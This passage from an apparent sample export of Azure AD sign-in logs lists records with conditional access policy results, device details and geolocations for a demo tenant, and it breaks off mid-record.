+1365,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,04cb58d1-a8ea-4c2b-8ffb-08527ccabaf7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2dc92ee6-03c4-4d81-9c6d-29ffb3520600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2dc92ee6-03c4-4d81-9c6d-29ffb3520600,SigninLogs,Sucess,36.6404686,-78.26995087
+1366,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c6547365-18ad-4654-a232-c54946b75615,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Teams,1fec8e78-bce4-4aaf-ab1b-5451cc387264,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:32,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'IE 7.0', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",368167e5-753b-476f-b20c-ef023b500500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,368167e5-753b-476f-b20c-ef023b500500,SigninLogs,Sucess,50.6406517,5.572050095
+1367,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:47.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c9d29a1e-cb6a-4bbb-ab3e-00dd6762d9ca,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ca1de4aa-1783-40c1-890d-66bcbc060700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,ca1de4aa-1783-40c1-890d-66bcbc060700,SigninLogs,Sucess,50.6406517,5.572050095
+1368,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:08.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,08f76801-7f78-4c64-a873-fe83fc4f14e4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Teams,1fec8e78-bce4-4aaf-ab1b-5451cc387264,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:31,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'IE 7.0', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",48cf7de2-e659-4e20-aee0-25dc067a0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,48cf7de2-e659-4e20-aee0-25dc067a0700,SigninLogs,Sucess,50.6406517,5.572050095
+1369,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:10.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b16f2415-5fd6-434b-9666-175e4d2d941e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fbcf3a57-b92a-4bcf-a38d-09fb69b00700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,fbcf3a57-b92a-4bcf-a38d-09fb69b00700,SigninLogs,Sucess,34.06555176,-118.2405396
+1370,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:49.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9d759ea3-3460-4d2b-aadb-f9b0cdbb2f20,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d3a3c86e-d6a1-4323-9bc0-1a26ea1c0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d3a3c86e-d6a1-4323-9bc0-1a26ea1c0600,SigninLogs,Sucess,50.6406517,5.572050095
+1371,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:34.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bb3cb49d-2b6f-4c1b-b35f-4b36a341823d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca7d2660800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,3006daeb-4fa9-44e4-baa4-8ca7d2660800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1372,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:29.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:33,"{'operatingSystem': 'Windows 